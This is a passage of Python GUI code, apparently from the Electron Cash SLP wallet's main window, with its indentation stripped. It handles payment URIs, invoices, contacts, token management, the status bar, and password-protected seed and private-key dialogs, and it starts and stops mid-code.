if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
pass
# the following is now not needed since slp dust amounts are now hard coded
'''
This if-statement was added for SLP around the following two lines
in order to keep the amount field locked and Max button disabled
when the payto field is edited when a token is selected.
'''
# if self.is_slp_wallet and self.token_type_combo.currentData():
# self.amount_e.setFrozen(True)
# self.max_button.setEnabled(False)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
# Note: the below loop freezes all SLP widgets if present in the send
# tab; redo this when BIP70 supports SLP token sends. -Calin
for e in self.slp_send_tab_widgets:
e.setDisabled(True)
if self.is_slp_wallet:
# force SLP token type to 0 for payment requests
self.token_type_combo.setCurrentIndex(0)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
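# Parses a payment URI and populates the send tab; URIs carrying a BIP70 request
# ('r', or 'name' plus 'sig') are routed through prepare_for_payment_request().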
def pay_to_URI(self, URI):
self.do_clear()
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
if 'ms-python' in URI: # this is needed for visual studio code debugger
return
self.show_error(_('Invalid Address URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
scheme = out.get('scheme')
address = out.get('address')
amounts = out.get('amounts')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(URI.split('?')[0])
if message:
self.message_e.setText(message)
if amounts:
if scheme == networks.net.CASHADDR_PREFIX and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif self.is_slp_wallet and scheme == networks.net.SLPADDR_PREFIX:
# pick first token in amounts
tokenid = None
for key in amounts:
if key != 'bch':
tokenid = key
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
if index == self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(0)
from .slp_add_token_dialog import SlpAddTokenDialog
def add_token_callback():
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
SlpAddTokenDialog(self, token_id_hex = tokenid, token_name=None, allow_overwrite=None, add_callback=add_token_callback)
return
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
break
if tokenid is None and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
self.slp_extra_bch_cb.setChecked(True)
self.slp_extra_bch_cb.clicked.emit()
else:
self.show_error("Unsupported URI prefix: " + scheme)
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, resetting its UI state to its initial state.'''
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
self.amount_e.setHidden(False)
self.amount_label.setHidden(False)
if self.is_slp_wallet:
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
for e in self.slp_send_tab_widgets:
e.setDisabled(False)
self.slp_amount_e.setText('')
self.token_type_combo.setCurrentIndex(0)
self.on_slptok() # resets parts of the send tab to initial state
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
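# Builds the address converter tab: the entered address is shown in cashaddr,
# legacy and SLP formats as the user types.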
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
slp_address = ButtonsLineEdit()
slp_address.setReadOnly(True)
slp_address.addCopyButton()
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
(slp_address, Address.FMT_SLPADDR)
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
grid.addWidget(QLabel(_('SLP address')), 3, 0)
grid.addWidget(slp_address, 3, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
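# Wrap the given list widget in a tab widget. ListTab.showEvent() switches
# the global address display on show: SLP format for SLP wallets, CashAddr
# otherwise. Optional list_header widgets are laid out in a row above the list.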
class ListTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if self.main_window.is_slp_wallet:
self.main_window.toggle_cashaddr(2, True)
else:
self.main_window.toggle_cashaddr(1, True)
w = ListTab()
w.main_window = self
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_slp_mgt_tab(self):
self.create_token_dialog = None
from .slp_mgt import SlpMgt
self.token_list = l = SlpMgt(self)
w = self.create_list_tab(l)
vbox = w.layout()
vbox.setSpacing(10)
create_button = b = QPushButton(_("Create New Token"))
create_button.setAutoDefault(False)
create_button.setDefault(False)
b.clicked.connect(self.show_create_token_dialog)
vbox.addWidget(create_button)
w.setLayout(vbox)
return w
def show_create_token_dialog(self):
c, u, x = self.wallet.get_balance()
bal = c + u - self.wallet.get_slp_locked_balance()
if bal < 1000:
self.receive_tab.low_balance_warning_shown = True
self.show_warning("Low BCH balance.\n\nBefore creating a new token you must add Bitcoin Cash to this wallet. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.show_receive_tab()
self.toggle_cashaddr(1, True)
return
try:
self.create_token_dialog.show()
self.create_token_dialog.raise_()
self.create_token_dialog.activateWindow()
except AttributeError:
self.create_token_dialog = d = SlpCreateTokenGenesisDialog(self)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
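# Return the explicitly selected 'pay from' coins if any, otherwise all
# spendable coins from the wallet.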
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def get_slp_coins(self, isInvoice = False):
return self.wallet.get_slp_spendable_coins(self.slp_token_id, None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def add_token_type(self, token_class, token_id, token_name, decimals_divisibility, *, error_callback=None, show_errors=True, allow_overwrite=False):
# FIXME: are the args error_callback and show_errors both necessary?
# Maybe so if we want the default to be self.show_error...
if not show_errors:
# setting error_callback to None will suppress errors being shown
# iff show_errors is False
error_callback = None
if error_callback is None and show_errors:
# They asked for errors but supplied no callback. Use the standard
# one for main_window
error_callback = self.show_error
# The below call checks sanity and calls error_callback for us
# with an error message argument on failure, returning False.
# On success it will add the token, write to wallet storage,
# and potentially kick off the verifier.
if not self.wallet.add_token_safe(
token_class, token_id, token_name, decimals_divisibility,
error_callback=error_callback, allow_overwrite=allow_overwrite,
write_storage=True):
return False
# Great success! Update GUI.
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
return True
def delete_slp_token(self, token_ids):
if not self.question(_("Remove {} from your list of tokens?")
.format(" + ".join(token_ids))):
return
for tid in token_ids:
self.wallet.token_types.pop(tid)
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
self.wallet.save_transactions(True)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.export_file_data())
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
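# Load the stored invoice for 'key' into the send tab, force verification to
# re-run, and route the result to payment_request_ok() or payment_request_error().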
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.addr_format_label = QLabel("")
sb.addPermanentWidget(self.addr_format_label)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they don't interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
is_cointext = bool(self.payto_e.cointext)
if is_cointext and self.slp_token_id:
self.token_type_combo.setCurrentIndex(0)
self.send_button.setVisible(not self.wallet.is_watching_only() and not is_cointext)
self.preview_button.setVisible(not is_cointext)
self.cointext_button.setVisible(is_cointext)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
def toggle_search(self):
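# Show or hide the search box in the status bar, swapping it with the balance
# label; re-applies the current filter text when shown and clears it when hidden.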
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
'''Apply search text to all tabs. FIXME: if a plugin later is loaded
it will not receive the search filter -- but most plugins I know about
do not support searchable_list anyway, so hopefully it's a non-issue.'''
for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog, SeedBackupDialog
WhichClass = SeedBackupDialog if self.wallet.storage.get('wallet_seed_needs_backup') else SeedDialog
d = WhichClass(self.top_level_window(), seed, passphrase, wallet=self.wallet)
if d.exec_() == QDialog.Accepted:
# This branch is in case they were in the SeedBackupDialog; below
# makes the new non-warning icon (if any) take effect
self.update_status()
d.setParent(None) # gc now rather than later
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
f = encrypt_but.font(); f.setPointSize(f.pointSize()-1); encrypt_but.setFont(f) # make font -= 1
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
